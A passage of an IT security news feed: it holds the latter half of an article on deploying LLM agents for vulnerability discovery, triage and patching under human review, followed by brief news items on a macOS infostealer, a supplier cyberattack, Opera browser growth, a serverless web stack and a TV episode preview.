<p><span>While techniques like Chain of Thought (CoT) prompting allow models to bridge this gap by decomposing complex code paths into intermediate reasoning steps, this process remains bounded by architectural limitations. Even when a model possesses a context window large enough to ingest entire repositories, it may experience attention degradation across long inputs, often failing to correctly weight intervening validation or sanitization logic within the prompt. For example, if a variable is tainted on line 10 but sanitized on line 500, attention degradation can cause the model to lose track of the sanitization logic. Furthermore, when enterprise codebases require chunking to fit within context limits, the resulting fragmentation may cause the model to lose track of end-to-end data flows.</span></p>
<p><span>Consequently, probabilistic engines are effective at uncovering localized, static anomalies, such as hardcoded credentials or outdated dependencies, but frequently misjudge complex vulnerabilities split across fragmented chunks or extended context windows. Notable exceptions occur when these probabilistic models are coupled with deterministic feedback loops. For instance, when analyzing C++ memory corruption, an LLM can be equipped with a test harness to iteratively execute code and definitively prove a crash. While these dynamic validation applications are detailed in subsequent sections, the baseline limitation for static analysis across standard enterprise codebases remains: models struggle to consistently evaluate dispersed logic.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image4.max-1000x1000.png" alt="Demystifying AI image4">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ak3zc">Figure 4: Deterministic SAST scanners vs. probabilistic LLMs</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Binary and architectural oracles</span></h3>
<p><span>Many security programs are moving toward agent workflows where an agent autonomously spins up a test environment and uses tools to execute payloads and verify its findings. This is a promising approach, but it is important to understand where it is most effective.</span></p>
<p><span>Agent workflows perform well against bug classes with binary and observable oracles, meaning the system provides an objective, 'crash or no crash' feedback loop. For example, if a model is hunting for memory corruption in a C++ kernel, a successful exploit is undeniable: the payload executes, and a resulting crash definitively proves the vulnerability. This explains why the industry is currently seeing a surge in AI-discovered vulnerabilities across memory-unsafe targets like web browsers and operating systems.</span></p>
<p><span>However, enterprise software is heavily dominated by vulnerabilities that require architectural oracles for validation. Vulnerabilities like authorization bypasses, complex business logic flaws, and indirect server-side request forgeries require an understanding of business context and cross-service trust boundaries. If an agent's payload fails to produce a clear outcome, it can't reliably distinguish whether the vulnerability is a hallucination or if it simply constructed the payload incorrectly. An agent's malformed payload might even crash an unrelated background process and cause the model to hallucinate a success and report a false confirmation. Complex enterprise architecture contains unwritten business intent that a probabilistic engine can't inherently know.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image3.max-1000x1000.png" alt="Demystifying AI image3">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 5: Evaluating vulnerabilities against binary vs. architectural oracles</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Targeted deployment and human impact</span></h3>
<p><span>Organizations adopting LLMs for vulnerability discovery face a massive staffing challenge. LLMs can generate findings significantly faster than human engineers can triage them. If every LLM-generated alert requires manual review, security teams will quickly face burnout and/or suffer alarm fatigue.</span></p>
<p><span>Rather than indiscriminately pointing agents at all available codebases and risking an influx of unverified output, security teams need a selective deployment strategy. Mature programs should maintain SAST and DAST for baseline hygiene and deterministic rule enforcement, and reserve intensive agent audits for high-impact components with clear binary oracles.</span></p>
<p><span>Organizations can prioritize agent audits on systems where the technology's strengths align with the broader risk profile:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Memory-unsafe codebases:</strong><span> Legacy or high-performance components written in memory-unsafe languages such as C, C++, or Assembly are strong candidates for LLM audits. These languages are susceptible to memory corruption flaws, such as buffer overflows and use-after-free conditions. Because these vulnerabilities trigger definitive failure states like segmentation faults, they work well with automated sandboxes where agents can compile the code with memory sanitizers and write proof-of-concept inputs. This approach is also effective for auditing the native extensions where safe languages call unsafe internal libraries, such as Python C extensions or the Java Native Interface (JNI).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Systems highly exposed to outside content:</strong><span> First-party data ingestion pipelines, custom API gateways, or proprietary edge proxies. A prerequisite here is direct access to the source code, this strategy is strictly for internally developed or fully open-source codebases where the organization can inspect the logic. Because these systems directly parse untrusted internet traffic, targeting their source code for LLM-driven audits yields the highest risk-reduction ROI.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Shared internal libraries and utilities: </strong><span>Core serialization/deserialization packages, common utility functions, and custom middleware wrappers (such as internal message-queue parsers) maintained in-house. Because the enterprise owns the source code for these shared building blocks, agent tools can easily hook into them within automated test harnesses to fuzz inputs and catch low-level logic or parsing bugs with high fidelity.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Foundational security boundaries:</strong><span> Internally developed centralized authentication services, custom OAuth providers, and internal credential brokers. While testing complex identity boundaries generates higher logic-based noise, having full access to the source code allows teams to pair agents with deterministic checks to safely triage findings, given that the blast radius of an authentication failure justifies the human effort.</span></p>
</li>
</ul>
<p><span>To filter the noise generated by LLMs, organizations should establish routing rules. Require the agent to generate a fully reproducible, deterministic test harness (such as a compiled binary or a Python test script) that attempts to prove the exploit. This harness must execute automatically in an isolated, monitored sandbox. If the sandbox execution fails (due to a syntax error or a failed exploit), the ticket is discarded, sparing human resources. However, organizations should enforce execution timeouts and iteration limits on these test harnesses. Without hard limits, an autonomous agent attempting to prove a vulnerability can fall into an infinite loop: writing a script, failing, rewriting, and failing again, exhausting API token budgets and compute resources against a single dead-end vulnerability, creating significant cost overruns without advancing the security review. To manage these expenses, organizations should incorporate FinOps principles to balance the compute and API costs of LLM audits against the traditional expenses of manual triage.</span></p>
<p><span>However, a successful execution in the sandbox does not guarantee an actionable, high-priority risk. In practice, autonomous agents frequently produce working PoCs for genuine technical flaws that are ultimately irrelevant; or warrant a lower remediation priority within the context of the system's threat model. For example, the agent might successfully exploit an unreachable dead-code path, or trigger a bug that requires administrative access to execute and yields no further escalation of privilege. Therefore, a human engineer should be assigned to review and prioritize the ticket only if the sandbox registers a successful execution, validating environmental context, reachability, and true business impact as part of the review.</span></p>
<p><span>This workflow reduces the volume of alerts, but it is important to understand that the security team's workload does not disappear. The engineer's primary job shifts from manually hunting for the initial vulnerability to auditing the LLM-generated proof to ensure it represents a meaningful risk rather than an unexploitable or contextually irrelevant finding. Leadership should properly staff and train teams for this new reality. Deploying LLM agents does not remove the need for skilled practitioners; it redirects their workload toward complex validation. Equally important is training teams to recognize the risk of false negatives. A hyper-focus on filtering AI-generated noise can create a false sense of security. If an exploit relies on a novel technique or a zero-day vulnerability that was not heavily weighted in the model's training data, the agent will likely scan right past it in silence. LLMs augment discovery, but they do not guarantee exhaustive coverage.</span></p>
<p><span>When integrating LLMs into SAST triage pipelines, human engineers should also verify the broader architectural integrity. Prompting an LLM with specific SAST warnings can induce contextual narrowing, where the agent becomes hyper-fixated on resolving a localized syntax error and misses broader architectural flaws existing in the same file. Furthermore, if the agent's mandate extends beyond discovery to automated remediation (such as writing and proposing code fixes), this human-in-the-loop validation becomes critical to ensure the LLM does not inadvertently introduce new regressions or bypass intended business logic.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image_20.max-1000x1000.png" alt="Demistiying Image 6 New">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 6: Flowchart outlining the targeted LLM deployment and triage workflow.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Remediation and hardening</span></h3>
<h4><span>LLM-assisted code remediation</span></h4>
<p><span>A primary goal of integrating large language models (LLMs) into the software development lifecycle is automated remediation. To achieve this, organizations are deploying these capabilities through two primary execution methods: directly within the integrated development environment (IDE) or as a centralized pipeline runner. Examples include </span><a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"><span>CodeMender</span></a><span>, although as of time of writing, it is not publicly available.</span></p>
<h4><strong>IDE-integrated method</strong><span> </span></h4>
<p><span>This method shifts remediation as far left as possible by operating as an active pair-programmer. Tools running continuous static analysis in the background of the IDE surface vulnerabilities directly to the developer via editor diagnostics like inline indicators or hover tooltips.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Localized scope:</strong><span> The developer can trigger the LLM agent to analyze the localized data flow and generate a targeted patch (such as implementing parameterized SQL queries). By constraining the LLM to localized, syntax-level fixes, the scope of the change remains contained. This prevents the agent from attempting sprawling, multi-file refactors that frequently break complex architectural logic.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Human-in-the-loop:</strong><span> The developer reviews the AI-generated patch before the code is committed.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Managing false positives:</strong><span> Local IDE agents allow developers to manage false positives dynamically. Suppressing alerts anchored to specific line text reduces alert fatigue and preserves developer trust.</span></p>
</li>
</ul>
<h4><strong>CI/CD runner method</strong><span> </span></h4>
<p><span>The runner method executes asynchronously within the CI/CD pipeline to use an LLM to review committed code and automatically propose remediation.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Restricted execution and deterministic validation: </strong><span>Asking a centralized runner to automatically rewrite a complex, multi-file authorization flaw directly in the main branch introduces a high risk of breaking logic errors. To mitigate this, agents must be restricted to generating pull requests (PRs). Once a PR is generated, it must automatically execute standard regression suites alongside the deterministic test harness. By rerunning the initial PoC against the patched code, the workflow repurposes the exploit script as a validation oracle to prove the vulnerability has been remediated. A human engineer then reviews the PR to validate the architectural logic before merging.</span></p>
</li>
</ul>
<p><span>In all cases security teams should define a clear boundary between the two methods rather than rely on a single approach. IDE agents provide immediate, syntax-level support. They catch and resolve low-complexity errors locally before developers commit code. Centralized CI/CD runners handle broader organizational baselines. They propose complex, repository-wide fixes for vulnerabilities that bypass local environments.</span></p>
<h4><strong>Post-deployment controls</strong><span> </span></h4>
<p><span>Even with human review and deterministic test harnesses, AI-generated patches can still introduce logic regressions in production. Organizations should implement strict post-deployment controls:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Automated rollbacks:</strong><span> Treating LLM-generated code with the same post-deployment scrutiny as any major architectural change ensures that if an unforeseen regression traverses the CI/CD pipeline, the environment can revert to a known good state.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Mitigating model drift:</strong><span> Relying on managed AI services introduces the ongoing risk of model drift. To prevent silent weight updates from breaking test harnesses, organizations need to pin specific model API versions to frozen releases. When a pinned version reaches its end-of-life, organizations will face a forced migration. Mitigating this pipeline fragility requires combining model pinning with deterministic regression suites.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Compliance and auditability:</strong><span> If an AI agent automatically closes a security ticket or generates a patch in the CI/CD pipeline, organizations should maintain immutable audit logs to satisfy frameworks like SOC 2 ,PCI-DSS, FedRAMP, and CMMC. National security deployments must also account for data sovereignty requirements. This logging should record the specific model version that proposed the fix, the deterministic test results that validated it, and the human engineer who approved the merge. Furthermore, because emerging legislation like the EU AI Act emphasizes human oversight for high-risk applications, security teams should carefully evaluate how autonomous remediation workflows align with these evolving global regulatory standards.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Screenshot_2026-07-15_at_10.24.22PM.max-1000x1000.png" alt="demistifying image 7">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 7: Flowchart demonstrating the difference between local IDE AI remediation and centralized CI/CD pipeline remediation.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Conclusion</span></h3>
<p><span>Leveraging LLMs in vulnerability management is a multi-layer solution: Integrating it requires separating workflows by layer. At the enterprise infrastructure level, Risk-Based Vulnerability Management (RBVM) and exposure management are necessary to process the volume of findings and configuration drift. At the product and code security level, LLM-enabled vulnerability assessment and remediation must operate alongside foundational deterministic controls, such as SAST and DAST, to audit custom, open-source, or third-party code.</span></p>
<p><span>Although LLMs can help manage technical debt and accelerate vulnerability discovery, they do not replace secure-by-design principles. The fact that LLM agents are proving exceptionally capable at identifying and exploiting localized memory corruption in memory-unsafe codebases, alongside other primary vectors, should serve as a wake-up call. </span></p>
<p><span>As a long-term strategy aligned with </span><a href="https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF" rel="noopener" target="_blank"><span>NSA guidance on Software Memory Safety</span></a><span>, organizations need to phase memory-safe languages into new internal development. LLMs are beginning to expand what is possible here by reducing the manual labor required for code migration. Converting existing C or C++ codebases to Rust has historically been unrealistic due to the large volume of engineering hours needed. While fully automated translation is not a turn-key solution, using LLMs to assist engineers with the bulk of the conversion can make these long-term migrations operationally viable. Beyond internal efforts, organizations should use procurement requirements to incentivize vendors to reduce their reliance on memory-unsafe languages and establish secure configuration defaults over time. Bridging the gap between AI velocity and enterprise defense means building an automated pipeline to manage the current backlog, while architecting systems where entire classes of vulnerabilities and misconfigurations are eliminated by design.</span></p>
<h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Google Threat Intelligence Group (GTIG) and other broader Google teams.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickLock: Neue macOS-Infostealer erzwingt per 210‑ms-App-Kills das Entsperr-Passwort]]></title>
<description><![CDATA[SILICON VALLEY / LONDON (IT BOLTWISE) – Ein neuer macOS-Infostealer namens ClickLock stellt Opfer vor eine brutale Wahl: Er tötet innerhalb von Millisekunden-System-Apps und blockiert das Desktop-Umfeld, bis das Login-Passwort eingegeben wird. Erst danach setzt die Malware auf Diebstahl von Brows...]]></description>
<link>https://tsecurity.de/de/3673653/it-security-nachrichten/clicklock-neue-macos-infostealer-erzwingt-per-210ms-app-kills-das-entsperr-passwort/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673653/it-security-nachrichten/clicklock-neue-macos-infostealer-erzwingt-per-210ms-app-kills-das-entsperr-passwort/</guid>
<pubDate>Thu, 16 Jul 2026 15:39:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clicklock-macos-infostealer-forced-password-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">SILICON VALLEY / LONDON (IT BOLTWISE) – Ein neuer macOS-Infostealer namens ClickLock stellt Opfer vor eine brutale Wahl: Er tötet innerhalb von Millisekunden-System-Apps und blockiert das Desktop-Umfeld, bis das Login-Passwort eingegeben wird. Erst danach setzt die Malware auf Diebstahl von Browser-Credentials, Keychain-Daten und Kryptowallet-Informationen. Gruppen-telemetrie zu Folgefällen deutet auf eine laufende Kampagne mit mindestens 100 […]</p>
<div><a href="https://www.it-boltwise.de/clicklock-neue-macos-infostealer-erzwingt-per-210%E2%80%91ms-app-kills-das-entsperr-passwort.html">... den vollständigen Artikel <strong>»ClickLock: Neue macOS-Infostealer erzwingt per 210‑ms-App-Kills das Entsperr-Passwort«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/clicklock-neue-macos-infostealer-erzwingt-per-210%E2%80%91ms-app-kills-das-entsperr-passwort.html">ClickLock: Neue macOS-Infostealer erzwingt per 210‑ms-App-Kills das Entsperr-Passwort</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KFC may be forced to shut some stores following cyberattack at key supplier]]></title>
<description><![CDATA[Nichirei Co confirmed shutting parts of its infrastructure offline to contain a cyberincident which could affect KFC Japan stores.]]></description>
<link>https://tsecurity.de/de/3673067/it-nachrichten/kfc-may-be-forced-to-shut-some-stores-following-cyberattack-at-key-supplier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673067/it-nachrichten/kfc-may-be-forced-to-shut-some-stores-following-cyberattack-at-key-supplier/</guid>
<pubDate>Thu, 16 Jul 2026 12:17:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nichirei Co confirmed shutting parts of its infrastructure offline to contain a cyberincident which could affect KFC Japan stores.]]></content:encoded>
</item>
<item>
<title><![CDATA[Opera Browser Gains Major iPhone User Growth In The US And UK]]></title>
<description><![CDATA[More people with iPhones are looking past Safari and picking a different option to browse the web. Opera recently shared that its mobile application saw a massive jump in monthly active users during the second quarter of 2026. The company recorded a 50 percent increase in the United States and a ...]]></description>
<link>https://tsecurity.de/de/3671312/ios-mac-os/opera-browser-gains-major-iphone-user-growth-in-the-us-and-uk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671312/ios-mac-os/opera-browser-gains-major-iphone-user-growth-in-the-us-and-uk/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[More people with iPhones are looking past Safari and picking a different option to browse the web. Opera recently shared that its mobile application saw a massive jump in monthly active users during the second quarter of 2026. The company recorded a 50 percent increase in the United States and a 93 percent jump in the United Kingdom compared to the same period last year.



Looking at overall mobile growth for both iOS and Android, the browser saw active users jump by 66 percent in the UK and 40 percent in the US.



New features keep mobile users hooked on the browser platform



Much of this recent momentum comes from a software update that makes the app much easier to use. Opera introduced a new synchronization system for its iOS version. This tool allows users to instantly share their tabs, saved bookmarks, and passwords between a desktop computer and an iPhone.



The company also added quick media controls right inside the tab view. You can easily spot which page is playing audio and quickly mute or unmute the sound without clicking through multiple screens.



Artificial intelligence tools play a big role in keeping people around. The built in assistant can now handle image prompts and file uploads straight from a mobile phone. Along with these new updates, the company points out that a free virtual private network and a built in ad blocker are major reasons why people decide to keep using the app long term.



This growth builds on a wave of new users from Europe. Last year, new digital market rules forced Apple to show a browser choice screen on its devices. That change helped the alternative browser grow 42 percent across Europe. Now, that same energy is clearly spilling over into the US and UK markets.



The internet landscape is shifting, and people are proving they will stick with a third-party option if it offers the right mix of privacy and smart tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ship faster with GitHub, Vercel, and Firestore]]></title>
<description><![CDATA[These days, application developers can take their pick from a vast menu of architectural solutions. We can choose from the well-understood to the experimental, and from blended solutions in between. Several powerful middle-ground technologies that emerged during the cloud revolution have really c...]]></description>
<link>https://tsecurity.de/de/3671151/ai-nachrichten/ship-faster-with-github-vercel-and-firestore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671151/ai-nachrichten/ship-faster-with-github-vercel-and-firestore/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:19 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">These days, application developers can take their pick from a vast menu of architectural solutions. We can choose from the well-understood to the experimental, and from blended solutions in between. Several powerful middle-ground technologies that emerged during the cloud revolution have really come of age. Here we’ll take a look at putting together three of the most impressive: GitHub, Vercel, and Firestore.</p>



<p class="wp-block-paragraph">Each of these is an important tool in its own right that can be used to attack specific problems. In combination, they not only meet the needs of several important application scenarios, but they have a superpower—the ability to dramatically shorten the distance between development and deployment.</p>



<p class="wp-block-paragraph">There is nothing quite as gratifying as putting your hands on just the right mix of tools for a given need.</p>



<h2 class="wp-block-heading">A ‘no-ops’ stack built for speed</h2>



<p class="wp-block-paragraph">If your primary goal is sheer development velocity, you would be hard-pressed to top this architecture. This “no-ops” stack collapses the distance between your local IDE and a globally distributed production environment. You are essentially trading the overhead of managing VMs and load balancers for the sheer speed of committing code and watching it deploy automatically.</p>



<p class="wp-block-paragraph">While each component is highly flexible, adopting them requires a specific, event-driven mindset. There are a few finicky bits to manage, mostly around routing environment variables securely and designing around stateless back-end functions. But the constraints are obvious and well-documented.</p>



<p class="wp-block-paragraph">Before we look more closely, let’s quickly identify the kinds of apps that are a perfect fit here, along with those that are workable and those that really merit a different approach.</p>



<ul class="wp-block-list">
<li>The sweet spot (deploy and go): AI-mediated applications, asynchronous game back ends, and real-time collaborative B2B dashboards. This architecture perfectly absorbs the unpredictable latency of LLM APIs and instantly syncs state across multiple clients without requiring you to build custom WebSocket infrastructure.</li>



<li>The middle ground (workable, with trade-offs): Headless e-commerce, moderate IoT telemetry, and apps requiring scheduled batch processing. You will encounter friction if your catalog relies on deeply relational SQL constraints, or if your background reporting jobs take longer than a few minutes and hit serverless execution limits.</li>



<li>The danger zone (look elsewhere): High-frequency trading, fast-paced action multiplayer games, heavy data ETL pipelines, and core financial ledgers. Serverless architectures cannot natively hold open the persistent WebSockets required for twitch-reflex data, and heavy compute tasks will abruptly time out.</li>
</ul>



<p class="wp-block-paragraph">We should mention that these categories are not mutually exclusive. Many enterprise applications, such as a full-scale e-commerce platform, straddle these lines. You might use Vercel and Firestore to build a lightning-fast, reactive storefront that handles ephemeral user state like shopping carts, while simultaneously “stitching in” a managed SQL database like Supabase or PlanetScale. This hybrid approach allows you to maintain the relational integrity required for back-office inventory and financial ledgers and pair it with the front-end velocity this stack provides.</p>



<h2 class="wp-block-heading">GitHub: the bedrock</h2>



<p class="wp-block-paragraph">I don’t need to introduce you to <a href="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html" data-type="link" data-id="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html">GitHub</a>. It is a central element of the development landscape. I still remember CVS and SVN with a certain nostalgia, but the enhancements of <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html" data-type="link" data-id="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git</a> speak for themselves. When combined with the orchestration powers of GitHub, it is no wonder that virtually the whole industry has adopted this type of platform.</p>



<p class="wp-block-paragraph">Git plus GitHub gives you an enormous amount of power already, in terms of how you can organize and automate your projects. But there is a next-level experience in combining GitHub and Vercel. For <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html" data-type="link" data-id="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a>-based projects, you can take simple GitHub pushes and turn them into instantly deployed clients and serverless functions. It is one of the cleanest and least fiddly ways to move from raw code on your local machine to a globally deployed, full-stack architecture.</p>



<h2 class="wp-block-heading">Vercel: the nexus</h2>



<p class="wp-block-paragraph">Vercel is more than just a deployment host. It is a control plane that ties this high-velocity, no-ops architecture together. Alongside GitHub and Firestore, Vercel’s deeper strength is its ability to act as an orchestration layer between your reactive front end and external stateful services.</p>



<p class="wp-block-paragraph">Vercel has a great amount of facility in fine-tuning what branches go to what environment and helpful features like instant rollback. You can just log into Vercel’s dashboard for your project and see the history of deployments and any errors and logs. It’s a simple menu choice to roll back to a historical version or compare one version against another.</p>



<p class="wp-block-paragraph">When you “stitch in” third-party services (such as a managed SQL database like <a href="https://www.infoworld.com/article/4168581/developing-local-first-apps-with-react-supabase-and-powersync.html" data-type="link" data-id="https://www.infoworld.com/article/4168581/developing-local-first-apps-with-react-supabase-and-powersync.html">Supabase</a> or a payment processor like Stripe), Vercel’s serverless functions become the lightweight interface, and Vercel’s the adapters handle the communication. You offload the integration logic (the service layer) to Vercel’s global Edge Network, keeping your UI and back end clean, responsive, and decoupled. </p>



<p class="wp-block-paragraph">In short, Vercel allows you to get the speed of the “no-ops” development life cycle without sacrificing the complex transactional integrity required for some applications like enterprise inventory systems. </p>



<h2 class="wp-block-heading">Firestore: the datastore</h2>



<p class="wp-block-paragraph">Firestore is an extremely lightweight, NoSQL, cloud datastore. It has a great deal of add-on power, but its core value proposition is that it accepts virtually any data you stuff into it and it provides event-driven subscriptions to data changes.</p>



<p class="wp-block-paragraph">These two capabilities together make Firestore about as straightforward a solution to a managed back end as you can imagine. You subscribe to collections or even fields and then you simply stick “unstructured” data (read: JSON with variable fields) in and the client waits for the changes it is interested in.</p>



<p class="wp-block-paragraph">This is so streamlined that one can just point the browser (or native mobile app) directly at Firestore and listen for events. Which immediately raises the question of identity, for auth and for data visibility, but hold on—Firestore’s third superpower is that it has an authentication module <em>that actually works. </em>What I mean is, it is actually pretty simple and yet confidently secures your app.</p>



<p class="wp-block-paragraph">Sometimes auth solutions seem either too simple (and yet opaque) or too mired in the nitty gritty. <a href="https://docs.cloud.google.com/firestore/native/docs/authentication" data-type="link" data-id="https://docs.cloud.google.com/firestore/native/docs/authentication">Firestore auth</a> will let you do some basic configuration and start using a reasonable auth almost immediately. </p>



<p class="wp-block-paragraph">Not to belabor the point, but having a realistic and attainable auth solution elevates your stack to a production grade—one that can handle many real-world applications. Firestore auth plays nicely with other important APIs, like Stripe. Typically, auth is a major feature that feels like off-roading in a Honda Civic, but Firestore’s approach to auth, <em>added to this particular stack</em>, feels like a normal speed bump. It’s just another component you plug in, rather than a tentacled alien you weave into the your code.</p>



<h2 class="wp-block-heading">The limits of the velocity stack</h2>



<p class="wp-block-paragraph">This architecture combines components that are optimized for flexibility. That same character also introduces distinct limitations. Understanding these is essential before committing production workloads.</p>



<h3 class="wp-block-heading">The serverless life cycle</h3>



<p class="wp-block-paragraph">Serverless functions are spun up to handle requests. They close out soon afterward and lose any state. For that reason, they cannot natively hold open persistent WebSockets. If your system requires continuous, sub-millisecond, bidirectional streams—like a real-time multiplayer action game or a high-frequency trading dashboard—pure serverless will fight you all the way. You are forced to introduce a third-party managed WebSocket service to route messages back to your stateless endpoints via HTTP webhooks.</p>



<h3 class="wp-block-heading">The execution time ceiling</h3>



<p class="wp-block-paragraph">Vercel (like all serverless platforms) enforces strict timeouts on operations. While enterprise tiers might grant you up to 15 minutes, standard functions often time out after 10 to 60 seconds. Long-running tasks like video transcoding, database scripts, or orchestrating multi-step AI agent workflows, which might take 20 minutes to resolve, will run up against these limits. Heavy-lifting tasks must be offloaded to a dedicated, long-running service like Google Cloud Run, or broken into smaller, asynchronous chunks via message queues.</p>



<h3 class="wp-block-heading">The cold start reality</h3>



<p class="wp-block-paragraph">While the industry has made massive strides in minimizing initialization times—particularly with lightweight edge networks—traditional Node.js-based serverless functions still experience cold starts. If a function has not been invoked recently, or if traffic spikes require a new instance to spin up concurrently, the first request will take a noticeable latency hit as the container provisions and the code loads.</p>



<h3 class="wp-block-heading">API instead of RAM</h3>



<p class="wp-block-paragraph">In a traditional server environment, you can store transient data in global RAM, allowing subsequent requests to access shared context instantly. In the serverless model, every request might hit a fresh container. Therefore, <em>all</em> shared context must be externalized. Although Firestore serves brilliantly as the state manager, relying on a database for high-frequency, sub-millisecond, ephemeral caching introduces network latency and per-operation costs. That said, using a shared RAM state on a server is non-trivial also, unless you are using a single app server and VM (because high-availability or fail-over requirements will lessen the RAM win on a traditional server).</p>



<h2 class="wp-block-heading">Tuning for velocity and control</h2>



<p class="wp-block-paragraph">Every architectural decision is a trade-off. There are no cost-free choices. By adopting the GitHub, Vercel, and Firestore stack, you are explicitly maximizing feature velocity over fine-grained control.</p>



<p class="wp-block-paragraph">You lose the ability to tweak the underlying operating system, hold open persistent sockets, or run hour-long back-end scripts. In exchange, you gain an architecture that scales from zero to global distribution instantly, requires virtually no devops maintenance, and perfectly absorbs the asynchronous, event-driven realities of modern application development.</p>



<p class="wp-block-paragraph">For the right application—whether it is a fast-moving prototype or an enterprise AI copilot—this stack doesn’t just save time; it fundamentally changes how quickly a small team (or a single person) can impact the market. You stop worrying about build chains, load balancers, and server patches, and you focus on the central mission: shipping features.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 3 Preview: Juliette’s Memory Loss Could Become the Silo’s Biggest Threat]]></title>
<description><![CDATA[Silo Season 3 Episode 3 will continue Juliette Nichols’ fight to recover her missing memories as hidden forces tighten their control over Silo 18. The episode could show why her damaged memory now threatens everyone living underground.




Episode title: “A Dark Web”



Release date: Friday, July...]]></description>
<link>https://tsecurity.de/de/3670631/ios-mac-os/silo-season-3-episode-3-preview-juliettes-memory-loss-could-become-the-silos-biggest-threat/</link>
